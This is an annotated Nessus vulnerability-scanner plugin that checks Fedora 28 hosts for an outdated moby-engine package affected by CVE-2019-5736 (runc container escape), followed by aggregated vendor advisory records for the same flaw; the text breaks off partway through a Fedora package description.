ID FEDORA_2019-829524F28F.NASL Type nessus Reporter This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2021-02-02T00:00:00
Description
CVE-2019-5736
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory FEDORA-2019-829524f28f.
#
include("compat.inc");
# Registration pass: when `description` is set the script only declares its
# metadata (identity, references, scoring, dependencies, required KB keys)
# and leaves through the exit(0) at the end of this block, so the package
# check further down is not reached.
if (description)
{
# Plugin identity and revision bookkeeping.
script_id(122283);
script_version("1.4");
script_cvs_date("Date: 2019/09/23 11:21:11");
# Cross-references: the CVE this update addresses and the Fedora advisory ID.
script_cve_id("CVE-2019-5736");
script_xref(name:"FEDORA", value:"2019-829524f28f");
script_name(english:"Fedora 28 : moby-engine (2019-829524f28f)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
# NOTE(review): the description below carries only the CVE identifier and
# the extraction notice. No advisory text was captured, so the see_also
# link is the only pointer to what the update actually changes.
script_set_attribute(
attribute:"description",
value:
"CVE-2019-5736
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues."
);
script_set_attribute(
attribute:"see_also",
value:"https://bodhi.fedoraproject.org/updates/FEDORA-2019-829524f28f"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected moby-engine package."
);
# Scoring. NOTE(review): the CVSS2 base vector uses AV:N while the CVSS3
# base vector uses AV:L with UI:R, so the two disagree on attack vector;
# confirm which one downstream triage consumes before comparing scores.
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
# Exploit availability is recorded as true, consistent with the
# proof-of-concept exploit maturity (E:POC / E:P) in the temporal vectors.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
# Declared as a local check and scoped by CPE to the moby-engine package on
# Fedora 28.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:moby-engine");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:28");
# Timeline: vulnerability published 2019/02/11; patch and plugin both dated
# 2019/02/19.
script_set_attribute(attribute:"vuln_publication_date", value:"2019/02/11");
script_set_attribute(attribute:"patch_publication_date", value:"2019/02/19");
script_set_attribute(attribute:"plugin_publication_date", value:"2019/02/19");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
# Scheduling metadata: category, family, the script this one depends on and
# the KB keys it requires.
# presumably ssh_get_info.nasl is what populates the Host/* keys — verify.
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Preconditions, evaluated in order; each failed test hands a different
# reason to audit(). audit() comes from audit.inc, which is not shown here;
# the checks are written as if it ends the script (os_ver[1] is only read
# after the isnull() guard) — confirm.
# 1. Local checks must have been enabled for this host.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
# 2. The recorded release string must mention Fedora (`>!<` is NASL's
#    "is not a substring of" test).
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
# 3. Extract the numeric release from the string; stop if it cannot be parsed.
os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = os_ver[1];
# 4. Only Fedora 28 is in scope: "28" must be followed by a non-digit or the
#    end of the string, so a value such as "280" does not match.
if (! preg(pattern:"^28([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 28", "Fedora " + os_ver);
# 5. An RPM inventory must be present in the KB; without it there is nothing
#    to compare against.
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
# 6. Architecture gate: only hosts whose cpu string contains x86_64 or
#    matches i386-i686 proceed; anything else is audited as not implemented.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
# Package comparison. rpm_check(), rpm_report_get() and pkg_tests_get() are
# not defined in this file (rpm.inc is included above); presumably
# rpm_check() is true when the installed moby-engine build is older than the
# build named in `reference` — confirm.
# NOTE(review): only the moby-engine RPM version is compared. The script
# does not look at any runc binary on disk or at other container packages,
# so a "not affected" result covers this one package only.
flag = 0;
# flag is incremented when rpm_check() returns true.
if (rpm_check(release:"FC28", reference:"moby-engine-18.06.0-2.ce.git0ffa825.fc28")) flag++;
if (flag)
{
# Report against port 0 at SECURITY_HOLE severity, attaching whatever
# rpm_report_get() returns as the extra text.
security_report_v4(
port : 0,
severity : SECURITY_HOLE,
extra : rpm_report_get()
);
exit(0);
}
else
{
# Nothing flagged: audit as "not affected" when pkg_tests_get() returns a
# value, otherwise as moby-engine "not installed".
tested = pkg_tests_get();
if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
else audit(AUDIT_PACKAGE_NOT_INSTALLED, "moby-engine");
}
{"id": "FEDORA_2019-829524F28F.NASL", "bulletinFamily": "scanner", "title": "Fedora 28 : moby-engine (2019-829524f28f)", "description": "CVE-2019-5736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "published": "2019-02-19T00:00:00", "modified": "2021-02-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/122283", "reporter": "This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://bodhi.fedoraproject.org/updates/FEDORA-2019-829524f28f"], "cvelist": ["CVE-2019-5736"], "type": "nessus", "lastseen": "2021-02-01T02:33:25", "edition": 20, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-5736"]}, {"type": "f5", "idList": ["F5:K46421255"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC"]}, {"type": "hackerone", "idList": ["H1:495495"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:0201-1", "OPENSUSE-SU-2019:2286-1", "OPENSUSE-SU-2019:2245-1", "OPENSUSE-SU-2019:0252-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220191061", "OPENVAS:1361412562310876139", "OPENVAS:1361412562310875467", "OPENVAS:1361412562310852826", "OPENVAS:1361412562310875688", "OPENVAS:1361412562310876761", "OPENVAS:1361412562310852319", "OPENVAS:1361412562310876767", "OPENVAS:1361412562310875978", "OPENVAS:1361412562310876766"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2019-0303.NASL", "RANCHEROS_1_5_1.NASL", "FEDORA_2019-FD9345F44A.NASL", "FEDORA_2019-3F19F13ECD.NASL", "ORACLELINUX_ELSA-2019-0975.NASL", "FEDORA_2019-C1DAC1B3B8.NASL", "FEDORA_2019-352D4B9CD8.NASL", "FEDORA_2019-F455EF79B8.NASL", "FEDORA_2019-4DC1E39B34.NASL", "FEDORA_2019-DF2E68AA6B.NASL"]}, {"type": 
"virtuozzo", "idList": ["VZA-2019-008"]}, {"type": "fedora", "idList": ["FEDORA:7FBE46071258", "FEDORA:D35EC607603A", "FEDORA:1308F60C4220", "FEDORA:E1B606076F4E", "FEDORA:1D3BD6049C24", "FEDORA:6381060486F6", "FEDORA:0907F624D00F", "FEDORA:813AC604EC12", "FEDORA:E3C59624D00E", "FEDORA:421346101A44"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-0975"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:1ECEF05BCE67BDE50D7D24223957B465"]}, {"type": "archlinux", "idList": ["ASA-201902-6", "ASA-201902-20"]}, {"type": "threatpost", "idList": ["THREATPOST:B4C48A638705549FED64000361BA8526"]}, {"type": "thn", "idList": ["THN:B0FC327500C590C565FC4F46D8DCDD34"]}, {"type": "exploitdb", "idList": ["EDB-ID:46369", "EDB-ID:46359"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:5FB4BD7D34290CD0DF514F5CBED8F4CB"]}, {"type": "redhat", "idList": ["RHSA-2019:0408", "RHSA-2019:0303", "RHSA-2019:0401", "RHSA-2019:0304", "RHSA-2019:0975"]}, {"type": "amazon", "idList": ["ALAS-2019-1156"]}, {"type": "vmware", "idList": ["VMSA-2019-0001"]}, {"type": "zdt", "idList": ["1337DAY-ID-32182", "1337DAY-ID-32165"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:A525E32FDF6F1ECE16D67E1741C48E11"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:A8C47E018FA9A3D0723FC3A99FD592A7", "TRENDMICROBLOG:DD93FD0A6FE52A3DFF89C6F550E981D1"]}, {"type": "cisco", "idList": ["CISCO-SA-20190215-RUNC"]}], "modified": "2021-02-01T02:33:25", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2021-02-01T02:33:25", "rev": 2}, "vulnersScore": 6.8}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-829524f28f.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122283);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/09/23 11:21:11\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"FEDORA\", value:\"2019-829524f28f\");\n\n 
script_name(english:\"Fedora 28 : moby-engine (2019-829524f28f)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"CVE-2019-5736\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-829524f28f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected moby-engine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:moby-engine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"moby-engine-18.06.0-2.ce.git0ffa825.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"moby-engine\");\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "122283", "cpe": ["p-cpe:/a:fedoraproject:fedora:moby-engine", "cpe:/o:fedoraproject:fedora:28"], "scheme": null, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}}
{"cve": [{"lastseen": "2021-02-02T07:13:02", "description": "runc through 1.0-rc6, as used in Docker before 18.09.2 and other products, allows attackers to overwrite the host runc binary (and consequently obtain host root access) by leveraging the ability to execute a command as root within one of these types of containers: (1) a new container with an attacker-controlled image, or (2) an existing container, to which the attacker previously had write access, that can be attached with docker exec. This occurs because of file-descriptor mishandling, related to /proc/self/exe.", "edition": 26, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-02-11T19:29:00", "title": "CVE-2019-5736", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-5736"], "modified": "2020-11-16T20:46:00", "cpe": ["cpe:/o:opensuse:leap:15.0", "cpe:/o:canonical:ubuntu_linux:18.04", "cpe:/a:netapp:hci_management_node:-", "cpe:/o:fedoraproject:fedora:29", "cpe:/a:redhat:container_development_kit:3.7", "cpe:/o:fedoraproject:fedora:30", "cpe:/a:microfocus:service_management_automation:2018.02", 
"cpe:/o:opensuse:leap:15.1", "cpe:/a:microfocus:service_management_automation:2018.05", "cpe:/a:linuxfoundation:runc:0.1.1", "cpe:/o:canonical:ubuntu_linux:18.10", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:opensuse:leap:42.3", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/a:microfocus:service_management_automation:2018.08", "cpe:/o:canonical:ubuntu_linux:19.04", "cpe:/a:netapp:solidfire:-", "cpe:/a:linuxfoundation:runc:1.0.0", "cpe:/a:redhat:openshift:3.6", "cpe:/a:google:kubernetes_engine:-", "cpe:/a:opensuse:backports_sle:15.0", "cpe:/o:redhat:enterprise_linux:8.0", "cpe:/a:redhat:openshift:3.5", "cpe:/a:redhat:openshift:3.4", "cpe:/a:redhat:openshift:3.7", "cpe:/a:microfocus:service_management_automation:2018.11", "cpe:/a:hp:onesphere:-"], "id": "CVE-2019-5736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-5736", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:opensuse:leap:42.3:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:0.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "cpe:2.3:a:google:kubernetes_engine:-:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:redhat:openshift:3.6:*:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:-:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc6:*:*:*:*:*:*", "cpe:2.3:a:opensuse:backports_sle:15.0:sp1:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:hp:onesphere:-:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:container_development_kit:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.7:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc5:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", 
"cpe:2.3:a:microfocus:service_management_automation:2018.11:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.05:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.02:*:*:*:*:*:*:*", "cpe:2.3:a:microfocus:service_management_automation:2018.08:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "cpe:2.3:a:linuxfoundation:runc:1.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:hci_management_node:-:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.4:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:36", "bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability, and no F5 products were found to be vulnerable.\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of AskF5 Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n", "edition": 1, "modified": "2019-03-01T22:35:00", "published": "2019-03-01T22:35:00", "id": "F5:K46421255", "href": "https://support.f5.com/csp/article/K46421255", "title": "Docker privilege elevation vulnerability CVE-2019-5736", "type": "f5", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:49", 
"bulletinFamily": "software", "cvelist": ["CVE-2019-5736"], "description": "# \n\n## Severity\n\nHigh\n\n## Vendor\n\nOpen Container Initiative\n\n## Affected Cloud Foundry Products and Versions\n\n_Severity is High unless otherwise noted._\n\n * BPM\n * All prior to v1.0.3\n * Cloud Foundry Container Runtime (CFCR)\n * All versions prior to v0.29.0\n * Docker BOSH Release \n * All versions prior to v34.0.0\n * Garden runC\n * All versions prior to v1.18.2\n\n## Description\n\nThe vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn\u2019t matter if the command is not attacker-controlled) as root within a container in either of these contexts:\n\n* Creating a new container using an attacker-controlled image.\n\n* Attaching (docker exec) into an existing container which the attacker had previous write access to.\n\nThis vulnerability is *not* blocked by the default AppArmor policy, nor by the default SELinux policy on Fedora[++] (because container processes appear to be running as container_runtime_t). However, it *is* blocked through correct use of user namespaces (where the host root is not mapped into the container\u2019s user namespace).\n\nNOTE: The Garden-runC implementation used in Cloud Foundry is not impacted by this vulnerability because it leverages unprivileged containers and user namespaces. 
Garden has consumed the upstream fix in version v1.18.2 to ensure all redundant security controls remain functional.\n\n## Mitigation\n\nUsers of affected versions should apply the following mitigations or upgrades:\n\n * Releases that have fixed this issue include:\n * BPM: v1.0.3\n * Cloud Foundry Container Runtime (CFCR): v0.29.0\n * Docker BOSH Release: v34.0.0\n * Garden runC: v1.18.2\n\n## References\n\n * * [CVE Announcement](<https://groups.google.com/a/opencontainers.org/forum/#!topic/dev/Tc1ELm-8oDI>)\n * [CVE-2019-5736](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5736>)\n\n## History\n\n2019-02-14: Added fixed version for Cloud Foundry Container Runtime (CFCR)\n\n2019-02-13: Initial vulnerability report published\n", "edition": 4, "modified": "2019-02-13T00:00:00", "published": "2019-02-13T00:00:00", "id": "CFOUNDRY:1CA625F1FA872E0AB995AFC970D36DBC", "href": "https://www.cloudfoundry.org/blog/cve-2019-5736/", "title": "CVE-2019-5736:\u00a0runC container breakout | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2019-09-26T21:32:55", "bulletinFamily": "bugbounty", "bounty": 1000.0, "cvelist": ["CVE-2019-5736"], "description": "description here: \nhttps://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html\nPoC: https://github.com/q3k/cve-2019-5736-poc\n\nSome more links:\nhttps://seclists.org/oss-sec/2019/q1/119\nhttps://access.redhat.com/security/cve/cve-2019-5736\n\n## Impact\n\nIt allows to escape from container to root on host when unpatched version of Docker and Kubernetes are used.\nThis affects a pretty big part of internet, since a lot of services are using Docker and Kubernets these days.\nIt has also serious impact on cloud services\nAWS https://aws.amazon.com/security/security-bulletins/AWS-2019-002/ and GCP 
https://cloud.google.com/kubernetes-engine/docs/security-bulletins#february-11-2019-runc\nhttps://kubernetes.io/blog/2019/02/11/runc-and-cve-2019-5736/", "modified": "2019-09-26T20:35:06", "published": "2019-02-13T18:50:11", "id": "H1:495495", "href": "https://hackerone.com/reports/495495", "type": "hackerone", "title": "The Internet: CVE-2019-5736: Escape from Docker and Kubernetes containers to root on host", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2019-10-03T20:27:36", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for lxc fixes the following issues:\n\n Update to lxc 3.2.1. The changelog can be found at\n\n <a rel=\"nofollow\" href=\"https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322\">https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322</a>\n\n + seccomp: support syscall forwarding to userspace\n + add lxc.seccomp.allow_nesting\n + pidfd: Add initial support for the new pidfd api\n * Many hardening improvements.\n * Use /sys/kernel/cgroup/delegate file for cgroup v2.\n * Fix CVE-2019-5736 equivalent bug.\n\n - fix apparmor dropin to be compatible with LXC 3.1.0 (boo#1131762)\n\n", "edition": 1, "modified": "2019-10-03T18:20:43", "published": "2019-10-03T18:20:43", "id": "OPENSUSE-SU-2019:2245-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00007.html", "title": "Security update for lxc (moderate)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-07T22:28:25", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for lxc fixes the following issues:\n\n Update to lxc 3.2.1. 
The changelog can be found at\n\n <a rel=\"nofollow\" href=\"https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322\">https://discuss.linuxcontainers.org/t/lxc-3-2-1-has-been-released/5322</a>\n\n + seccomp: support syscall forwarding to userspace\n + add lxc.seccomp.allow_nesting\n + pidfd: Add initial support for the new pidfd api\n * Many hardening improvements.\n * Use /sys/kernel/cgroup/delegate file for cgroup v2.\n * Fix CVE-2019-5736 equivalent bug.\n\n - fix apparmor dropin to be compatible with LXC 3.1.0 (boo#1131762) This\n update was imported from the openSUSE:Leap:15.1:Update update project.\n\n", "edition": 1, "modified": "2019-10-07T21:18:10", "published": "2019-10-07T21:18:10", "id": "OPENSUSE-SU-2019:2286-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00029.html", "title": "Security update for lxc (moderate)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-27T15:30:10", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n", "edition": 1, "modified": "2019-02-27T12:17:02", "published": "2019-02-27T12:17:02", "id": "OPENSUSE-SU-2019:0252-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00071.html", "title": "Security update for docker-runc (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-19T01:01:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "This update for docker-runc fixes the following issues:\n\n Security issue fixed:\n\n - 
CVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\n avoid write attacks to the host runc binary, which could lead to a\n container breakout (bsc#1121967)\n\n This update was imported from the SUSE:SLE-12:Update update project.\n\n", "edition": 1, "modified": "2019-02-18T21:26:39", "published": "2019-02-18T21:26:39", "id": "OPENSUSE-SU-2019:0201-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-02/msg00044.html", "title": "Security update for docker-runc (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "fedora": [{"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "The runc command can be used to start containers which are packaged in accordance with the Open Container Initiative's specifications, and to manage containers running under runc. ", "modified": "2019-05-03T03:43:36", "published": "2019-05-03T03:43:36", "id": "FEDORA:D35EC607603A", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 29 Update: runc-1.0.0-92.dev.gitc1b8c57.fc29", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2019-5736"], "description": "Docker is an open source project to build, ship and run any application as a lightweight container. Docker containers are both hardware-agnostic and platform-agnostic. This me ans they can run anywhere, from your laptop to the largest EC2 compute instance and everything in between - and they don't require you to use a particular language, framework or packaging system. That makes them great building blo cks for deploying and scaling web apps, databases, and backend services without depending on a particular stack or provider. 
